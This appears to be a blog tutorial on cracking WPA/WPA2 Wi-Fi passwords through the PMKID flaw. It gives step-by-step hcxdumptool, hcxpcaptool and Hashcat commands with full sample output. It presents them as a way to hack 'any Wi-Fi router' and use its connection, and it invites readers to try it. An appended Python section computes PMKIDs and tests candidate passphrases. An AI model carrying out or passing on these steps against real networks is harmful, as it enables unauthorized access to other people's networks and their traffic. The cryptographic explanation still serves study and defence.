When it comes to the security of Wi-Fi networks, it’s well known among network security professionals that serious vulnerabilities have always existed that left them open to attack. The KRACK attack was unarguably the most infamous Wi-Fi hacking technique exploiting one such flaw in the Wi-Fi protocol. As time passed, many of those vulnerabilities were fixed by the Wi-Fi Alliance and hardware manufacturers, and the hacking methods relying on them stopped working. Now one more weakness has been discovered in the Wi-Fi protocol that allows attacks on both WPA and WPA2 protected networks. Let’s have a look at it.

The new WPA/WPA2 flaw

The flaw that makes this attack possible is a new one. It was discovered by Jens ‘atom’ Steube, the lead developer of the Hashcat password recovery tool. He found it accidentally while checking the upcoming WPA3 Wi-Fi protocol for possible loopholes. The attack doesn’t require capturing a complete EAPOL 4-way handshake. Instead, it relies on the Robust Security Network Information Element (RSN IE) of a single EAPOL frame, which carries the PMKID. From the PMKID the pre-shared key (PSK) of the network is recovered offline by password guessing (this is what Hashcat does in the last step below), and that PSK is the password used to log on to the network.

The difference between old and new method

According to Steube there is a major difference between the old hacking methods and this new one. While the old methods required a user of the Wi-Fi network to be logged on (so that the handshake could be captured), this new method eliminates that requirement. It works even if no one is connected to the network. As long as the network is available, it will work.

Things you need

Before we get started you’ll have to download the following tools from their own respective links:

  • hcxdumptool (version 4.2 or higher): This is a tool that can capture packets from WLAN devices. Download the entire folder as a ZIP file.

  • hcxpcaptool: This converts the captured pcapng file into a hash file that Hashcat can read.

  • Hashcat (version 4.2.0 or higher): The version that added the WPA-PMKID-PBKDF2 hash mode (16800) used in the last step.

Once you’ve downloaded all 3 of them you’re good to go. Let’s get started:

The steps for hacking a Wi-Fi password using new method

Given below are the steps to hack the password of any Wi-Fi router using the latest WPA/WPA2 flaw:

STEP 1: First of all, let’s use hcxdumptool to obtain the PMKID of the target network. The PMKID will then be used to recover the password of that network. Just execute the following command:

$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 --enable_status

This will lead to an output like this:

start capturing (stop with ctrl+c)
INTERFACE:...............: wlp39s0f3u4u5
FILTERLIST...............: 0 entries
MAC CLIENT...............: 89acf0e761f4 (client)
MAC ACCESS POINT.........: 4604ba734d4e (start NIC)
EAPOL TIMEOUT............: 20000
DEAUTHENTICATIONINTERVALL: 10 beacons
GIVE UP DEAUTHENTICATIONS: 20 tries
REPLAYCOUNTER............: 62083
ANONCE...................: 9ddca61888470946305b27d413a28cf474f19ff64c71667e5c1aee144cd70a69

If the target network accepts your association request, you’ll receive a message saying “FOUND PMKID”, as shown below:

[13:29:57 - 011] 89acf0e761f4 -> 4604ba734d4e <ESSID> [ASSOCIATIONREQUEST, SEQUENCE 4]
[13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [ASSOCIATIONRESPONSE, SEQUENCE 1206]
[13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [FOUND PMKID]

Depending on the nature of the network this may take some time. Steube recommends allowing the command to run for at least 10 minutes before aborting.

STEP 2: Now dump the received frame into a file (in ‘pcapng’ format).

STEP 3: Now, with the help of hcxpcaptool, convert the received frame into a hash format. Execute the following command:

$ ./hcxpcaptool -z test.16800 test.pcapng

You’ll get an output like this:

start reading from test.pcapng
summary:
--------
file name....................: test.pcapng
file type....................: pcapng 1.0
file hardware information....: x86_64
file os information..........: Linux 4.17.11-arch1
file application information.: hcxdumptool 4.2.0
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 66
skipped packets..............: 0
packets with FCS.............: 0
beacons (with ESSID inside)..: 17
probe requests...............: 1
probe responses..............: 11
association requests.........: 5
association responses........: 5
authentications (OPEN SYSTEM): 13
authentications (BROADCOM)...: 1
EAPOL packets................: 14
EAPOL PMKIDs.................: 1

1 PMKID(s) written to test.16800

Now you’ll see the hashed output in the written file. The content of that file will look like this:

2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a

STEP 4: Now run Hashcat to derive the pre-shared key from this hashed PMKID. Execute the following command:

$ ./hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'

The output will look like this:

hashcat (v4.2.0) starting...

OpenCL Platform #1: NVIDIA Corporation
======================================
* Device #1: GeForce GTX 1080, 2028/8112 MB allocatable, 20MCU
* Device #2: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU
* Device #3: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU
* Device #4: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates

Applicable optimizers:
* Zero-Byte
* Single-Hash
* Single-Salt
* Brute-Force
* Slow-Hash-SIMD-LOOP

Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63

Watchdog: Temperature abort trigger set to 90c

2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a:hashcat!

Session..........: hashcat
Status...........: Cracked
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: 2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf...a39f3a
Time.Started.....: Thu Jul 26 12:51:38 2018 (41 secs)
Time.Estimated...: Thu Jul 26 12:52:19 2018 (0 secs)
Guess.Mask.......: ?l?l?l?l?l?lt! [8]
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....:   408.9 kH/s (103.86ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
Speed.Dev.#2.....:   408.6 kH/s (104.90ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
Speed.Dev.#3.....:   412.9 kH/s (102.50ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
Speed.Dev.#4.....:   410.9 kH/s (104.66ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
Speed.Dev.#*.....:  1641.3 kH/s
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 66846720/308915776 (21.64%)
Rejected.........: 0/66846720 (0.00%)
Restore.Point....: 0/11881376 (0.00%)
Candidates.#1....: hariert! -> hhzkzet!
Candidates.#2....: hdtivst! -> hzxkbnt!
Candidates.#3....: gnxpwet! -> gwqivst!
Candidates.#4....: gxhcddt! -> grjmrut!
HWMon.Dev.#1.....: Temp: 81c Fan: 54% Util: 75% Core:1771MHz Mem:4513MHz Bus:1
HWMon.Dev.#2.....: Temp: 81c Fan: 54% Util:100% Core:1607MHz Mem:4513MHz Bus:1
HWMon.Dev.#3.....: Temp: 81c Fan: 54% Util: 94% Core:1683MHz Mem:4513MHz Bus:1
HWMon.Dev.#4.....: Temp: 81c Fan: 54% Util: 93% Core:1620MHz Mem:4513MHz Bus:1

Started: Thu Jul 26 12:51:30 2018
Stopped: Thu Jul 26 12:52:21 2018

And that’s it. You’ve successfully hacked the target network, and now you can start browsing on it. The hack is expected to work against all 802.11 i/p/q/r networks, though this claim has not been verified yet. Give it a try and let us know in the comments whether it works or not.
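To see what the captured hash line actually lets someone test, here is the derivation that Hashcat mode 16800 performs, written as an added example (not code from hcxtools or Hashcat): the PMK is PBKDF2-HMAC-SHA1 over the passphrase with the ESSID as salt, and the PMKID is the first 16 bytes of HMAC-SHA1(PMK, "PMK Name" || MAC_AP || MAC_STA). Every guess costs 4096 PBKDF2 iterations and the salt is the network name, which is why the only control a PSK network owner has against this offline attack is a long, random passphrase; the ESSID, MACs and passphrase in the sample are constructed.

```python
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, essid: bytes) -> bytes:
    """WPA/WPA2-PSK master key: PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), essid, 4096, dklen=32)


def pmkid_from_pmk(pmk: bytes, mac_ap: bytes, mac_sta: bytes) -> bytes:
    """PMKID carried in the RSN IE: HMAC-SHA1-128(PMK, "PMK Name" || MAC_AP || MAC_STA)."""
    return hmac.new(pmk, b"PMK Name" + mac_ap + mac_sta, hashlib.sha1).digest()[:16]


def parse_16800(line: str) -> dict:
    """Split one hcxpcaptool / hashcat -m 16800 line: PMKID*MAC_AP*MAC_STA*ESSID, all hex."""
    pmkid, mac_ap, mac_sta, essid = line.strip().split("*")
    if len(pmkid) != 32 or len(mac_ap) != 12 or len(mac_sta) != 12:
        raise ValueError("malformed 16800 line")
    return {"pmkid": bytes.fromhex(pmkid), "mac_ap": bytes.fromhex(mac_ap),
            "mac_sta": bytes.fromhex(mac_sta), "essid": bytes.fromhex(essid)}


def build_16800(passphrase: str, essid: bytes, mac_ap: bytes, mac_sta: bytes) -> str:
    """Produce the 16800 line an AP with this ESSID/passphrase would yield (for self-checks)."""
    pmkid = pmkid_from_pmk(pmk_from_passphrase(passphrase, essid), mac_ap, mac_sta)
    return "*".join(x.hex() for x in (pmkid, mac_ap, mac_sta, essid))


def passphrase_matches(line: str, candidate: str) -> bool:
    """One offline guess: the work Hashcat repeats per candidate (PBKDF2 dominates the cost)."""
    h = parse_16800(line)
    pmkid = pmkid_from_pmk(pmk_from_passphrase(candidate, h["essid"]), h["mac_ap"], h["mac_sta"])
    return hmac.compare_digest(pmkid, h["pmkid"])


# Constructed sample (not a real network): hypothetical ESSID, locally administered MACs, passphrase.
SAMPLE_LINE = build_16800("correct-horse-battery", b"HomeNet-5G",
                          bytes.fromhex("0200000000aa"), bytes.fromhex("0200000000bb"))

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print(passphrase_matches(SAMPLE_LINE, "correct-horse-battery"))  # True
    print(passphrase_matches(SAMPLE_LINE, "password1"))               # False
```

The line written by hcxpcaptool above has the same four hex fields, so parse_16800 reads it directly; only the ESSID field varies in length because it is the raw network name.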